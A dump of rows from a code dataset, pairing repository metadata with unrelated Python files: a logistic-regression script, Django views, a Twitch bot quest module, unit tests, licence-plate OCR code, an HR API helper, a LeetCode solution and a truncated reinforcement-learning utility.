# 1 1 0
# 2 0 0
# 3 1 0
# 4 0 1
# 문자 변수를 숫자 변수로 치환하기
df['num_y'] = pd.get_dummies(df['y'], drop_first=True)
# 범주형 변수명 가져오기
categorical_vars = df.drop(['y', 'num_y'], axis=1).columns[df.drop(['y', 'num_y'], axis=1).dtypes == 'object']
# 숫자형 변수명 가져오기
num_vars = df.drop(['y', 'num_y'], axis=1).columns[df.drop(['y', 'num_y'], axis=1).dtypes != 'object']
# 범주형 변수에 대한 가변수 구성하기
dumm_data = pd.get_dummies(df[categorical_vars], prefix_sep='_', drop_first=True)
# 가변수와 숫자형 변수만을 이용한 입력 특징 데이터 구성하기
Xdf = df.join(dumm_data)[num_vars.tolist() + dumm_data.columns.tolist()]
X = Xdf.values
# 목표 변수 구성하기
y = df['num_y'].values
# 데이터 분할
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)
# 로지스틱 함수 적합
logisticModel = LogisticRegression(random_state=123)
logisticModel.fit(X_train, y_train)
# 적합 결과
logisticModel.coef_
logisticModel.intercept_
# 예측
logisticModel.predict(X_test)
logisticModel.predict_proba(X_test)
df['num_y'].value_counts()
predicted = logisticModel.predict(X_test)
pd.Series(predicted).value_counts()
score = logisticModel.score(X_test, y_test) # return mean accuracy, 정분류율 반환
# 0.8983050847457628
# prob = logisticModel.predict_proba(X_test)[:, 1]
# confusion matrix (분류 결과표)
metrics.confusion_matrix(y_test, predicted)
# array([[1171, 28],
# [ 110, 48]], dtype=int64)
#
# ROC 그래프 그리기
#
# 모델에 의한 예측 확률 계산
y_pred_proba = logisticModel.predict_proba(X_test)[::, 1]
# fpr: 1-특이도, tpr: 민감도, auc 계산
fpr, tpr, _ = metrics.roc_curve(y_true=y_test, y_score=y_pred_proba)
auc = metrics.roc_auc_score(y_test, y_pred_proba)
# ROC 그래프 생성
plt.figure(figsize=(6, 6))
plt.plot(fpr, tpr, label="로지스틱 회귀\n곡선밑 면적(AUC)=" + "%.4f" % auc)
plt.plot([-0.02, 1.02], [-0.02, 1.02], color='gray', linestyle=':', label='무작위 모델')
plt.margins(0)
plt.legend(loc=4)
plt.xlabel('fpr: 1-Specificity')
plt.ylabel('tpr: Sensitivity')
# plt.axhline(y=0.7, color='red', label='민감도 기준선')
# plt.axvline(x=0.2, color='green', label='1-특이도 기준선')
plt.title("ROC Curve", weight='bold')
plt.legend()
plt.savefig(png_path + '/logistic_ROC2.png')
plt.show()
| [
"[email protected]"
] | |
2704840558c8b5a61a9cdc328fdc4c88c17852d6 | c91d029b59f4e6090a523bf571b3094e09852258 | /src/comercial/views/tabela_de_preco.py | 8d55cd86e2acf528caf034482365982811ed0587 | [
"MIT"
] | permissive | anselmobd/fo2 | d51b63ebae2541b00af79448ede76b02638c41f0 | 8e7f8f3d9a296c7da39d0faf38a266e9c6c162ab | refs/heads/master | 2023-08-31T19:59:33.964813 | 2023-08-31T19:50:53 | 2023-08-31T19:50:53 | 92,856,677 | 1 | 0 | MIT | 2023-04-21T21:50:46 | 2017-05-30T17:04:27 | Python | UTF-8 | Python | false | false | 4,518 | py | from pprint import pprint
from django.shortcuts import render
from django.urls import reverse
from django.views import View
from fo2.connections import db_cursor_so
import comercial.forms as forms
import comercial.queries as queries
class TabelaDePreco(View):
def __init__(self):
super().__init__()
self.Form_class = forms.TabelaDePrecoForm
self.template_name = 'comercial/tabela_de_preco.html'
self.title_name = 'Tabela de preços'
def mount_context(self, cursor, tabela):
context = {'tabela': tabela}
codigo_tabela_chunks = tabela.split('.')
if len(codigo_tabela_chunks) != 3:
context.update({
'erro': 'Código inválido. '
'3 números inteiros separados por ".".'
})
data = queries.get_tabela_preco(cursor, order='a')
if len(data) == 0:
context.update({'erro': 'Sem tabelas de preço'})
return context
for row in data:
row['tabela'] = "{:02d}.{:02d}.{:02d}".format(
row['col_tabela_preco'],
row['mes_tabela_preco'],
row['seq_tabela_preco'],
)
row['tabela|LINK'] = reverse(
'comercial:tabela_de_preco__get',
args=[row['tabela']]
)
row['data_ini_tabela'] = row['data_ini_tabela'].date()
row['data_fim_tabela'] = row['data_fim_tabela'].date()
context.update({
'headers': [
'Tabela',
'Descrição',
'Início',
'Fim',
],
'fields': [
'tabela',
'descricao',
'data_ini_tabela',
'data_fim_tabela',
],
'data': data,
})
return context
for subcodigo_tabela in codigo_tabela_chunks:
if not subcodigo_tabela.isdigit():
context.update({
'erro': 'Cada subcódigo deve ser um número inteiro.'
})
return context
codigo_tabela_ints = list(map(int, codigo_tabela_chunks))
tabela = "{:02d}.{:02d}.{:02d}".format(*codigo_tabela_ints)
context = {'tabela': tabela}
data = queries.get_tabela_preco(cursor, *codigo_tabela_ints)
if len(data) == 0:
context.update({'erro': 'Tabela não encontrada'})
return context
for row in data:
row['data_ini_tabela'] = row['data_ini_tabela'].date()
row['data_fim_tabela'] = row['data_fim_tabela'].date()
context.update({
'headers': [
'Descrição',
'Início',
'Fim',
],
'fields': [
'descricao',
'data_ini_tabela',
'data_fim_tabela',
],
'data': data,
})
i_data = queries.itens_tabela_preco(cursor, *codigo_tabela_ints)
if len(i_data) == 0:
context.update({'erro': 'Tabela vazia'})
return context
context.update({
'i_headers': [
'Referência',
'Descrição',
'Valor',
],
'i_fields': [
'grupo_estrutura',
'descr_referencia',
'val_tabela_preco'
],
'i_data': i_data,
})
return context
def get(self, request, *args, **kwargs):
if 'tabela' in kwargs:
return self.post(request, *args, **kwargs)
else:
context = {'titulo': self.title_name}
form = self.Form_class()
context['form'] = form
return render(request, self.template_name, context)
def post(self, request, *args, **kwargs):
context = {'titulo': self.title_name}
form = self.Form_class(request.POST)
form.data = form.data.copy()
if 'tabela' in kwargs:
form.data['tabela'] = kwargs['tabela']
if form.is_valid():
tabela = form.cleaned_data['tabela']
cursor = db_cursor_so(request)
context.update(self.mount_context(cursor, tabela))
context['form'] = form
return render(request, self.template_name, context)
| [
"[email protected]"
] | |
ae678eb02ca8de59e362c11fec61c9695fa5694d | 93a68ff3fe2bcf46827d55a3f90f983376d19984 | /pajbot/modules/quest.py | 60a19c187e509b88293f062ed108d329bc9a6015 | [
"MIT"
] | permissive | cubelious/pajbot | 8abe0b9239c1a1ce90671f69e75bec5d9114f9e5 | 53db8f8cfe7e3fa405ef088a23010e4d833891c6 | refs/heads/master | 2021-01-25T02:30:41.791769 | 2016-02-08T15:47:30 | 2016-02-08T15:47:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,413 | py | import logging
import random
from pajbot.modules import BaseModule, ModuleSetting
from pajbot.models.command import Command
from pajbot.models.handler import HandlerManager
from pajbot.managers import RedisManager
from pajbot.tbutil import find
from pajbot.streamhelper import StreamHelper
log = logging.getLogger(__name__)
class QuestModule(BaseModule):
ID = __name__.split('.')[-1]
NAME = 'Quest system'
DESCRIPTION = 'Give users a single quest at the start of each day'
SETTINGS = []
def __init__(self):
super().__init__()
self.current_quest = None
def my_progress(self, **options):
bot = options['bot']
source = options['source']
if self.current_quest is not None:
quest_progress = source.get_quest_progress()
if quest_progress is not False:
bot.say('Your current quest progress is {}'.format(quest_progress))
else:
bot.say('You have no progress on the current quest.')
else:
bot.say('There is no quest active right now.')
def get_current_quest(self, **options):
bot = options['bot']
if self.current_quest is not None:
bot.say('Current quest active: {0.NAME} - {1}'.format(self.current_quest, self.current_quest.get_objective()))
else:
bot.say('There is no quest active right now.')
def get_user_tokens(self, **options):
bot = options['bot']
source = options['source']
bot.say('{} has {} tokens'.format(source.username_raw, source.get_tokens()))
def load_commands(self, **options):
self.commands['myprogress'] = Command.raw_command(self.my_progress)
self.commands['currentquest'] = Command.raw_command(self.get_current_quest)
self.commands['quest'] = self.commands['currentquest']
self.commands['tokens'] = Command.raw_command(self.get_user_tokens)
def on_stream_start(self):
available_quests = list(filter(lambda m: m.ID.startswith('quest-'), self.submodules))
if len(available_quests) == 0:
log.error('No quests enabled.')
return False
self.current_quest = random.choice(available_quests)
self.current_quest.start_quest()
redis = RedisManager.get()
redis.set(self.current_quest_key, self.current_quest.ID)
self.bot.say('Stream started, new quest has been chosen!')
self.bot.say('Current quest objective: {}'.format(self.current_quest.get_objective()))
def on_stream_stop(self):
if self.current_quest is None:
log.info('No quest active on stream stop.')
return False
self.current_quest.stop_quest()
self.current_quest = None
self.bot.say('Stream ended, quest has been reset.')
redis = RedisManager.get()
# Remove any mentions of the current quest
redis.delete(self.current_quest_key)
last_stream_id = StreamHelper.get_last_stream_id()
if last_stream_id is False:
log.error('No last stream ID found.')
# No last stream ID found. why?
return False
# XXX: Should we use a pipeline for any of this?
# Go through user tokens and remove any from more than 2 streams ago
for key in redis.keys('{streamer}:*:tokens'.format(streamer=StreamHelper.get_streamer())):
all_tokens = redis.hgetall(key)
for stream_id_str in all_tokens:
try:
stream_id = int(stream_id_str)
except (TypeError, ValueError):
log.error('Invalid stream id in tokens by {}'.format(key))
continue
if last_stream_id - stream_id > 1:
log.info('Removing tokens for stream {}'.format(stream_id))
redis.hdel(key, stream_id)
def on_loaded(self):
if self.bot:
self.current_quest_key = '{streamer}:current_quest'.format(streamer=self.bot.streamer)
def on_managers_loaded(self):
if self.current_quest is None:
redis = RedisManager.get()
current_quest_id = redis.get(self.current_quest_key)
log.info('Try to load submodule with ID {}'.format(current_quest_id))
if current_quest_id is not None:
current_quest_id = current_quest_id.decode('utf8')
quest = find(lambda m: m.ID == current_quest_id, self.submodules)
if quest is not None:
log.info('Resumed quest {}'.format(quest.get_objective()))
self.current_quest = quest
self.current_quest.start_quest()
else:
log.info('No quest with id {} found in submodules ({})'.format(current_quest_id, self.submodules))
def enable(self, bot):
HandlerManager.add_handler('on_stream_start', self.on_stream_start)
HandlerManager.add_handler('on_stream_stop', self.on_stream_stop)
HandlerManager.add_handler('on_managers_loaded', self.on_managers_loaded)
self.bot = bot
def disable(self, bot):
HandlerManager.remove_handler('on_stream_start', self.on_stream_start)
HandlerManager.remove_handler('on_stream_stop', self.on_stream_stop)
HandlerManager.remove_handler('on_managers_loaded', self.on_managers_loaded)
| [
"[email protected]"
] | |
12ecee822cc835c4a06bd011e3765246a6c67b7e | 628ae3506d28acc472c39d5452b675e3f1d4f4ac | /tests/test_statements.py | 43bfe4ed545a252f7fa8ed41a7b2ebe6fcee671b | [] | no_license | jucacrispim/sol | 6be9aad187a1d2367ccd2a59347817ef0162954b | 2c001812559ea586d2532d81f475f379a38b7b7d | refs/heads/master | 2021-06-23T11:41:31.448769 | 2019-10-21T06:28:22 | 2019-10-21T06:28:22 | 216,483,311 | 0 | 0 | null | 2021-04-20T18:47:42 | 2019-10-21T05:18:54 | Python | UTF-8 | Python | false | false | 2,303 | py | # -*- coding: utf-8 -*-
from unittest.mock import Mock
import pytest
from sol import statements
def test_statement():
statement = statements.Statement()
with pytest.raises(NotImplementedError):
statement({})
def test_say(mocker):
mocker.patch.object(statements, 'print', Mock(spec=print))
say = statements.Say('hei')
say({})
assert statements.print.called
def test_say_context_var(mocker):
mocker.patch.object(statements, 'print', Mock(spec=print))
say = statements.Say('hei {oi}')
say({'oi': 'ola'})
assert statements.print.call_args[0][0] == 'hei ola'
def test_ask(mocker):
mocker.patch.object(statements, 'print', Mock(spec=print))
mocker.patch.object(statements, 'input', Mock(spec=input,
return_value='oi'))
ask = statements.Ask('what?', 'oque')
r = ask({})
assert r == {'oque': 'oi'}
def test_if_true(mocker):
mocker.patch.object(statements, 'print', Mock(spec=print))
mocker.patch.object(statements, 'input', Mock(spec=input,
return_value='oi'))
cond = 'a == 1'
true_body = [('ask', 'ok?', 'ok')]
false_body = [('say', 'ok!')]
stmt = statements.If(cond, true_body, false_body)
context = {'a': 1}
stmt(context)
assert statements.input.called
def test_if_false(mocker):
mocker.patch.object(statements, 'print', Mock(spec=print))
mocker.patch.object(statements, 'input', Mock(spec=input,
return_value='oi'))
cond = 'a == 1'
true_body = [('ask', 'ok?', 'ok')]
false_body = [('say', 'ok!')]
stmt = statements.If(cond, true_body, false_body)
context = {'a': 2}
stmt(context)
assert not statements.input.called
def test_call():
expr = 'len("asdf")'
var = 'a'
stmt = statements.Call(expr, var)
context = stmt({})
assert context['a'] == 4
def test_exists_true():
var = '{a}'
stmt = statements.Exists(var, 'e')
context = {'a': 1}
context = stmt(context)
assert context['e'] is True
def test_exists_false():
var = '{a}'
stmt = statements.Exists(var, 'e')
context = {}
context = stmt(context)
assert context['e'] is False
| [
"[email protected]"
] | |
2d3d6fbdc5f2f1467114efc7cf5d20bee744c112 | de6e1bc6d0de103685c97a5124c15392e887a6ca | /Project300/useraccount/views.py | 8e478a6fd170855e328d4749f25befbe2ff14b83 | [] | no_license | rahmanrafi32/CholoGhureAshi | 474dabc3f6533f822ef8208cb45220276dd68fb5 | 16d213fcd39db163ab733ad05b0d59cbfbb4fabd | refs/heads/master | 2023-02-06T17:47:37.989236 | 2020-12-28T08:14:22 | 2020-12-28T08:14:22 | 324,951,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 120 | py | from django.shortcuts import render
# Create your views here.
def reg(request):
return render(request,"login.html") | [
"rafi.rahman03@yahoo,com"
] | rafi.rahman03@yahoo,com |
4b99d00e8213449a75885322365206396326fa5c | 155b520361166c0033853578ad6c13dd41a1e168 | /data-from-machinery-master/static/Dataset/Model/Number_plate_detection.py | bf04526057b40bc53cc68f8e72d906eefab5f08e | [] | no_license | NiraliLimbad/Data-from-machinery | 8ae5772b5c4e5085463527d543d3ff01e902639b | b4cd9030edc6667192921e27af0501aa32137d4f | refs/heads/main | 2023-06-01T20:14:07.869313 | 2021-06-19T11:31:58 | 2021-06-19T11:31:58 | 378,395,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,658 | py | import cv2
from PIL import Image, ImageEnhance, ImageFilter
import numpy as np
# import pytesseract
import os
import time
import imutils
def cleanPlate(plate):
print ("CLEANING PLATE. . .")
gray = cv2.cvtColor(plate, cv2.COLOR_BGR2GRAY)
# gray = cv2.GaussianBlur(gray,(3,3),0)
#kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))
#thresh= cv2.dilate(gray, kernel, iterations=1)
# _, thresh = cv2.threshold(gray, 125, 255, cv2.THRESH_BINARY)
# ret3,thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,11,2)
# cv2.imshow("thre",thresh)
# cv2.waitKey(0)
# thresh = gray
# cv2.imshow("thre",thresh)
# cv2.waitKey(0)
contours,hierarchy = cv2.findContours(thresh.copy(),cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
# cv2.drawContours(gray,contours,-1,[0,255,0],3)
#
# cv2.imshow("contour",gray)
# cv2.waitKey(0)
if contours:
areas = [cv2.contourArea(c) for c in contours]
max_index = np.argmax(areas)
max_cnt = contours[max_index]
max_cntArea = areas[max_index]
x,y,w,h = cv2.boundingRect(max_cnt)
# if not ratioCheck(max_cntArea,w,h):
# return plate,None
cleaned_final = thresh[y:y+h, x:x+w]
# cv2.imshow("Function Test",cleaned_final)
# cv2.waitKey(0)
return cleaned_final,[x,y,w,h]
else:
return plate,None
def ratioCheck(area, width, height):
ratio = float(width) / float(height)
if ratio < 1:
ratio = 1 / ratio
aspect = 4.7272
min = 15*aspect*15 # minimum area
max = 125*aspect*125 # maximum area
rmin = 3
rmax = 6
if (area < min or area > max) or (ratio < rmin or ratio > rmax):
return False
return True
def isMaxWhite(plate):
avg = np.mean(plate)
if(avg>=115):
return True
else:
return True
def recognize():
img = cv2.imread('test.jpg',cv2.IMREAD_COLOR)
img = cv2.resize(img, (620,480) )
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #convert to grey scale
cv2.imshow('image',gray)
cv2.waitKey(0)
gray = cv2.bilateralFilter(gray, 11, 17, 17) #Blur to reduce noise
cv2.imshow('image',gray)
cv2.waitKey(0)
edged = cv2.Canny(gray, 30, 200) #Perform Edge detection
cv2.imshow('image',edged)
cv2.waitKey(0)
# find contours in the edged image, keep only the largest
# ones, and initialize our screen contour
cnts = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:10]
screenCnt = None
# loop over our contours
for c in cnts:
# approximate the contour
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.018 * peri, True)
# if our approximated contour has four points, then
# we can assume that we have found our screen
if len(approx) == 4:
screenCnt = approx
break
if screenCnt is None:
detected = 0
print ("No contour detected")
else:
detected = 1
if detected == 1:
cv2.drawContours(img, [screenCnt], -1, (0, 255, 0), 3)
cv2.imshow('image',img)
cv2.waitKey(0)
# Masking the part other than the number plate
mask = np.zeros(gray.shape,np.uint8)
new_image = cv2.drawContours(mask,[screenCnt],0,255,-1,)
new_image = cv2.bitwise_and(img,img,mask=mask)
cv2.imshow('image',new_image)
cv2.waitKey(0)
# Now crop
(x, y) = np.where(mask == 255)
(topx, topy) = (np.min(x), np.min(y))
(bottomx, bottomy) = (np.max(x), np.max(y))
Cropped = gray[topx:bottomx+1, topy:bottomy+1]
cv2.imshow('image',new_image)
cv2.waitKey(0)
#Read the number plate
text = pytesseract.image_to_string(Cropped, config='--psm 11')
print("Detected Number is:",text)
cv2.imshow('image',img)
cv2.imshow('Cropped',Cropped)
cv2.waitKey(0)
cv2.destroyAllWindows()
def detect(image,temp):
face_cascade = cv2.CascadeClassifier('licence_plate.xml')
# image = cv2.imread(image)
# image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
print(image)
faces = face_cascade.detectMultiScale(image, 1.2, 5)
print(faces)
for (x, y, w, h) in faces:
#img = cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)
img = image[y:y+h,x:x+w]
#img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
if(isMaxWhite(img)):
#img = cv2.bilateralFilter(img, 11, 25, 25)
clean_plate, rect = cleanPlate(img)
if rect:
x1,y1,w1,h1 = rect
#x,y,w,h=x1,y+y1,w1,h1
cv2.imshow("Cleaned Plate",clean_plate)
cv2.waitKey(0)
plate_im = Image.fromarray(clean_plate)
text = pytesseract.image_to_string(plate_im, config='-c tessedit_char_whitelist=0123456789abcdefghijklmnopqrstuvwxyz --psm 9',lang='eng')
print ("Detected Text : ",text)
font = cv2.FONT_HERSHEY_SIMPLEX
bottomLeftCornerOfText = (x,y-10)
fontScale = 1
fontColor = (0,255,0)
lineType = 2
img = cv2.rectangle(temp,(x,y),(x+w,y+h),(0,255,0),2)
cv2.putText(temp,text,bottomLeftCornerOfText, font, fontScale, fontColor, lineType)
cv2.imshow("Detected Plate",temp)
cv2.waitKey(0)
cv2.destroyAllWindows()
# img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#
#
# gray = img
# gray = cv2.bilateralFilter(gray, 11, 17, 17)
#
#
#
# cv2.imshow("camera",gray)
# cv2.waitKey(0)
#
#
# text = pytesseract.image_to_string(gray,config='-c tessedit_char_whitelist=0123456789abcdefghijklmnopqrstuvwxyz --psm 9', lang='eng')
#
# print(text)
# cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, [0,255,0], 2)
#
#
# cv2.imshow("camera",image)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
def detect_LP(image,temp):
labelsPath = os.path.sep.join(['RSAD/static/Dataset/Model/yolo_v3_lic_plt', "coco.names"])
LABELS = open(labelsPath).read().strip().split("\n")
np.random.seed(42)
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3),dtype="uint8")
weightsPath = os.path.sep.join(['RSAD/static/Dataset/Model/yolo_v3_lic_plt', "yolov3.weights"])
configPath = os.path.sep.join(['RSAD/static/Dataset/Model/yolo_v3_lic_plt', "yolov3.cfg"])
# print("[INFO] loading YOLO from disk...")
net = cv2.dnn.readNetFromDarknet(configPath, weightsPath)
# image = cv2.imread(image)
# temp = cv2.imread(temp)
(H, W) = image.shape[:2]
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
blob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416),swapRB=True, crop=False)
net.setInput(blob)
start = time.time()
layerOutputs = net.forward(ln)
end = time.time()
# show timing information on YOLO
# print("[INFO] YOLO took {:.6f} seconds".format(end - start))
boxes = []
confidences = []
classIDs = []
# loop over each of the layer outputs
for output in layerOutputs:
# loop over each of the detections
for detection in output:
# extract the class ID and confidence (i.e., probability) of
# the current object detection
scores = detection[5:]
classID = np.argmax(scores)
confidence = scores[classID]
# filter out weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > 0.5:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[0:4] * np.array([W, H, W, H])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top and
# and left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
classIDs.append(classID)
idxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5,0.3)
# print(boxes)
# print(classIDs)
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# print(i)
# xtract the bounding box coordinates
(x, y) = (boxes[i][0], boxes[i][1])
(w, h) = (boxes[i][2], boxes[i][3])
# draw a bounding box rectangle and label on the image
color = [int(c) for c in COLORS[classIDs[i]]]
cv2.rectangle(temp, (x, y), (x + w, y + h), color, 2)
#text = "{}: {:.4f}".format(LABELS[classIDs[i]], confidences[i])
#cv2.putText(temp, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, color, 2)
img = image[y:y+h,x:x+w]
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
gray = img
# gray = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,11,2)
gray = cv2.bilateralFilter(gray, 11, 17, 17)
#
# cv2.imshow("camera",gray)
# cv2.waitKey(0)
#
#
text = pytesseract.image_to_string(gray,config='-c tessedit_char_whitelist=0123456789abcdefghijklmnopqrstuvwxyz --psm 9', lang='eng')
# print(text)
cv2.putText(temp, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, [0,255,0], 2)
#
# cv2.imshow("camera",image)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
#
def google_api():
from google.cloud import vision
from google.cloud.vision import types
import io
image_uri = '/Thunder/YOLO_object_detection/images/car7.jpg'
client = vision.ImageAnnotatorClient.from_service_account_file('lp-detection.json')
with io.open(image_uri,'rb') as image_file:
content = image_file.read()
image = vision.types.Image(content=content)
t = client.text_detection(image=image)
if __name__ == '__main__':
# recognize()
detect_LP('11.jpg','11.jpg')
# google_api() | [
"[email protected]"
] | |
11037e6cb64fd815fafcf2e8aee20a29b640aca2 | 68ebf4ffa77442eaafaf0e45d77c3bf72b867e54 | /itdblib/common/hr_intf.py | 06ee85cfb49afd710544da45fdb085e3bf75b897 | [] | no_license | wzqwsrf/itdb | 39fa5dafeb0da555930b9a5c5dd1d9a4918a5aa7 | 7dcbc21c32c96fcfdcdbd574b50ad85e82263fc7 | refs/heads/master | 2016-09-05T11:31:17.764488 | 2015-09-10T08:51:25 | 2015-09-10T08:51:25 | 42,232,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,157 | py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
# author: wangzq <[email protected]>
import json
import urllib2
from oslo_config import cfg
from qg.core import log as logging
LOG = logging.getLogger(__name__)
interface_opt = [
cfg.StrOpt('hr_one_intf',
default='',
help='fetch one'),
cfg.StrOpt('hr_all_intf',
default='',
help='fetch all'),
cfg.StrOpt('hr_auto_intf',
default='',
help='hr_auto_intf')
]
CONF = cfg.CONF
CONF.register_opts(interface_opt, 'INTERFACE')
__all = (
'fetchOne',
'fetchAll'
)
def fetch_info_by_id(param, id):
return fetch_info(param + id)
def auto_show_employee_info(id):
""" get all employee infos
"""
retDict = {}
url = CONF.INTERFACE.hr_auto_intf + id
retDict = call_http_intf(url)
return retDict
def fetch_info(param):
""" @param: rtx_id
"""
retDict = {}
try:
LOG.info("current rtx_id is : %s" % param)
url = CONF.INTERFACE.hr_one_intf
url = "%s%s" % (url, param)
except Exception as _ex:
LOG.error("error occured while format url: %s" % str(_ex))
return retDict
retDict = call_http_intf(url)
return retDict
def fetch_all_infos():
""" get all employee infos
"""
retDict = {}
url = CONF.INTERFACE.hr_all_intf
retDict = call_http_intf(url)
return retDict
def call_http_intf(url):
""" method: GET
"""
retDict = {}
try:
request = urllib2.Request(url)
retVal = urllib2.urlopen(request, timeout=20)
except urllib2.HTTPError as _ex:
LOG.error("The server couldn't fullfill the request")
LOG.error("Error code : %s" % str(_ex))
return retDict
except urllib2.URLError as _ex:
LOG.error("fetch the url content is error")
LOG.error("Error code : %s" % str(_ex))
return retDict
except Exception as _ex:
LOG.error("error occured while fetch one info: %s" % str(_ex))
return retDict
else:
res = retVal.read()
retDict = json.loads(res)
return retDict
| [
"[email protected]"
] | |
17e17767199549253f2047b58f7b8b665c882ca6 | dc87e2ad75edd66ef1da331bf4d464a20975ab3e | /main.py | 9c05273e01a16a0043dc4dbd720ab78f6da496ae | [] | no_license | DanilUryadnikov/Homewrok | 0488bf3ecf5ff980ff821a5be0bd9131c7bc983a | 97d4ddef86831df1afd3c6783921d6911f9f653f | refs/heads/master | 2023-02-03T15:44:30.257174 | 2020-12-24T10:53:35 | 2020-12-24T10:53:35 | 324,134,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,033 | py | import sys
from PyQt5.QtGui import QPainter, QColor
from PyQt5 import uic
from PyQt5.QtWidgets import QApplication, QMainWindow
import random
class round(QMainWindow):
def __init__(self):
super().__init__()
uic.loadUi('Ul.ui', self)
self.do_paint = False
self.pushButton.clicked.connect(self.paint)
self.l = []
def paintEvent(self, event):
if self.do_paint:
self.qp = QPainter()
self.qp.begin(self)
self.draw_flag(self.qp)
self.qp.end()
def paint(self):
self.do_paint = True
self.repaint()
def draw_flag(self, qp):
d = random.randint(30, 200)
x = random.randint(50, 600)
y = random.randint(50, 600)
self.qp.setBrush(QColor(255, 255, 0))
self.l.append([x, y, d])
for i in self.l:
self.qp.drawEllipse(i[0], i[1], i[2], i[2])
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = round()
ex.show()
sys.exit(app.exec()) | [
"[email protected]"
] | |
e20c38956babc6cbe3d1fc1963db34935844d010 | ed37c6acf35ad8dfa7064c7d304f046c3657cb7a | /leetcode/42_trapping_rain_water/solution.py | ae3f4855ee9795dcf6865c1ad42e29e0f6858bfd | [] | no_license | etture/algorithms_practice | 7b73753f5d579b7007ddd79f9a73165433d79b13 | ba398a040d2551b34f504ae1ce795e8cd5937dcc | refs/heads/master | 2021-11-18T20:37:11.730912 | 2021-10-03T23:25:24 | 2021-10-03T23:25:24 | 190,863,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,029 | py | # Basic imports --------------------------------------------
from __future__ import annotations
import sys
# 파이썬 기본 재귀 limit이 1000이라고 함 --> 10^6으로 manual하게 설정
sys.setrecursionlimit(10**6)
from os.path import dirname, abspath, basename, normpath
root = abspath(__file__)
while basename(normpath(root)) != 'algo_practice':
root = dirname(root)
sys.path.append(root)
from utils.Tester import Tester, Logger
logger = Logger(verbose=False)
import pprint
pp = pprint.PrettyPrinter()
# ----------------------------------------------------------
class Solution:
def trap(self, height: List[int]) -> int:
forward_max, backward_max = list(), list()
forward_prev, backward_prev = 0, 0
for h in height:
if h > forward_prev:
forward_prev = h
forward_max.append(forward_prev)
for h in height[::-1]:
if h > backward_prev:
backward_prev = h
backward_max.append(backward_prev)
backward_max = backward_max[::-1]
# print(f'forward: {forward_max}')
# print(f'backward: {backward_max}')
minimums = [forward_max[x] if forward_max[x] < backward_max[x] else backward_max[x] for x in range(len(height))]
# print(f'minimums: {minimums}')
rainwater = [minimums[x] - height[x] for x in range(len(height))]
return sum(rainwater)
if __name__ == '__main__':
sol = Solution()
test_cases = [
([[0,1,0,2,1,0,1,3,2,1,2,1]], 6),
([[4,2,0,3,2,5]], 9),
([[1,2,3,2,1]], 0),
([[3,2,1,2,3]], 4),
([[3,2,1,1,3]], 5),
([[1,3,5,2,1,3,1,6,1,2]], 14),
]
Tester.factory(test_cases, func=lambda input: sol.trap(*input)).run(unordered_output=False)
| [
"[email protected]"
] | |
03ffb80aa1cacd9b233a302fd7ca8876997f5fb0 | c016ed237862591c42fd00b973fced791247be37 | /src/garage/tf/_functions.py | 796fd5150cfecf418dec46dbd9d005ecb98446c7 | [
"MIT"
] | permissive | thanhkaist/garage | 726766a1e6fd465f776c42dc006f331a3b98cbd7 | 1d840df357282a675b8fce839bb0e5f72a8abba9 | refs/heads/master | 2022-11-05T23:40:08.057025 | 2020-06-21T16:59:15 | 2020-06-21T16:59:15 | 274,142,146 | 1 | 0 | MIT | 2020-06-22T13:18:14 | 2020-06-22T13:18:13 | null | UTF-8 | Python | false | false | 3,400 | py | """Utility functions for tf-based Reinforcement learning algorithms."""
import numpy as np
from garage.misc import tensor_utils as np_tensor_utils
from garage.tf.misc import tensor_utils
def paths_to_tensors(paths, max_path_length, baseline_predictions, discount,
gae_lambda):
"""Return processed sample data based on the collected paths.
Args:
paths (list[dict]): A list of collected paths.
max_path_length (int): Maximum length of a single rollout.
baseline_predictions(numpy.ndarray): : Predicted value of GAE
(Generalized Advantage Estimation) Baseline.
